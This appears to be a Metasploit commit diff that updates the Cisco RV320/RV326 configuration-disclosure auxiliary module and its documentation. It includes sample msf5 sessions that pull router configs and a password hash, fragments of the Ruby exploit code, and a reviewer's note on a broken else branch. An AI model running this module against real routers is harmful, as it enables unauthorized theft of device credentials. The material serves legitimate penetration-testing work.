Land #11399, cisco_rv320_config updates

4.x
William Vu 2019-02-13 17:00:35 -06:00 committed by Metasploit
parent 187b38c190
commit b4fed15d40
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 19 additions and 20 deletions


@ -15,7 +15,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
4. `run` 4. `run`
5. Review the downloaded configuration file cited in the output. For example: 5. Review the downloaded configuration file cited in the output. For example:
>``` >```
>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt >[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
>``` >```
6. If the database is connected, review the `hosts`, `creds`, and `loot` commands 6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
@ -27,7 +27,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
## Scenarios ## Scenarios
#### Against firmware version 1.4.2.15, which on the LAN side, port 443: #### Against firmware version 1.4.2.15, on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -41,25 +41,25 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against firmware version 1.4.2.15, on the WAN side, port 8007: #### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
``` ```
msf5 > msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34 msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
RHOSTS => 192.168.1.1 RHOSTS => 203.0.113.54
msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007 msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
RPORT => 8007 RPORT => 8007
msf5 auxiliary(gather/cisco_rv320_config) > set SSL false msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
SSL => false SSL => false
msf5 auxiliary(gather/cisco_rv320_config) > run msf5 auxiliary(gather/cisco_rv320_config) > run
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
[*] Scanned 1 of 1 hosts (100% complete) [*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against firmware version 1.4.2.17, which on the LAN side, port 443: #### Against firmware version 1.4.2.17, on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -73,7 +73,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against newer firmware (>= 1.4.2.19): #### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -96,7 +96,7 @@ Hosts
address mac name os_name os_flavor os_sp purpose info comments address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- -------- ------- --- ---- ------- --------- ----- ------- ---- --------
172.16.0.34 70:E4:22:94:E7:20 router94e720 Cisco RV320 203.0.113.54 70:E4:22:94:E7:20 router94e720 Cisco RV320
192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320 192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320
``` ```
@ -107,7 +107,7 @@ Credentials
host origin service public private realm private_type host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------ ---- ------ ------- ------ ------- ----- ------------
172.16.0.34 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash 203.0.113.54 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash 192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
``` ```
@ -119,6 +119,6 @@ Loot
host service type name content info path host service type name content info path
---- ------- ---- ---- ------- ---- ---- ---- ------- ---- ---- ------- ---- ----
172.16.0.34 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt 203.0.113.54 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt 192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
``` ```


@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco RV320/RV326 Configuration Disclosure', 'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{ 'Description' => %q{
A vulnerability in the web-based management interface of Cisco Small Business A vulnerability in the web-based management interface of Cisco Small Business
RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
remote attacker to retrieve sensitive information. The vulnerability is due remote attacker to retrieve sensitive information. The vulnerability is due
to improper access controls for URLs. An attacker could exploit this to improper access controls for URLs. An attacker could exploit this
vulnerability by connecting to an affected device via HTTP or HTTPS and vulnerability by connecting to an affected device via HTTP or HTTPS and
@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
]) ])
end end
def report_cred(user,hash) def report_cred(user, hash)
service_data = { service_data = {
address: rhost, address: rhost,
port: rport, port: rport,
@ -80,15 +80,14 @@ class MetasploitModule < Msf::Auxiliary
print_good("Stored configuration (#{config.length} bytes) to #{stored_path}") print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")
# Report host information to database # Report host information to database
mac = config.match(/^LANMAC=(.*)/)[1]
mac = "%s:%s:%s:%s:%s:%s" % [mac[0..1], mac[2..3], mac[4..5],
mac[6..7], mac[8..9], mac[10..11]]
hostname = config.match(/^HOSTNAME=(.*)/)[1] hostname = config.match(/^HOSTNAME=(.*)/)[1]
model = config.match(/^MODEL=(.*)/)[1] model = config.match(/^MODEL=(.*)/)[1]
mac = config.match(/^LANMAC=(.*)/)[1]
mac = mac.scan(/\w{2}/).join(':')
report_host(host: rhost, report_host(host: rhost,
mac: mac, mac: mac,
name: hostname, name: hostname,
os_name: "Cisco", os_name: 'Cisco',
os_flavor: model) os_flavor: model)
# Report password hashes to database # Report password hashes to database
@ -105,11 +104,11 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
}, 60) }, 60)
rescue OpenSSL::SSL::SSLError rescue OpenSSL::SSL::SSLError
fail_with(Failure::UnexpectedReply, "SSL handshake failed. Consider setting 'SSL' to 'false' and trying again.") fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
end end
if res.nil? if res.nil?
fail_with(Failure::UnexpectedReply, "Empty response. Please validate the RHOST and TARGETURI options and try again.") fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')
elsif res.code != 200 elsif res.code != 200
fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.") fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")
end end
@ -118,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
if body.match(/####sysconfig####/) if body.match(/####sysconfig####/)
parse_config(body) parse_config(body)
else body.include?"meta http-equiv=refresh content='0; url=/default.htm'" else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, "Response suggests device is patched") fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
end end
end end
end end
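Review bot: The `else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"` line in the last hunk never tests anything — after `else`, the `include?` call is an expression that is evaluated and discarded, so every response body that lacks `####sysconfig####` falls through to `fail_with(Failure::NotVulnerable, 'Response suggests device is patched')`, including a wrong host, a different product, or an unrelated error page. That turns any unexpected body into a false "patched" verdict, and this commit only re-quotes the message on the following line without fixing the branch. The fix is `elsif body.include?("meta http-equiv=refresh content='0; url=/default.htm'")` keeping the existing NotVulnerable `fail_with`, followed by a real `else` branch with `fail_with(Failure::UnexpectedReply, 'Unexpected response body. Please validate the RHOST and TARGETURI options and try again.')`, which matches the error style used for the nil and non-200 cases earlier in the same method. The enclosing method starts outside this hunk, and the `config.match(/^LANMAC=(.*)/)[1]` in the earlier hunk would presumably raise NoMethodError rather than report cleanly if a config lacks that key — worth a guard, but I have not confirmed the config format.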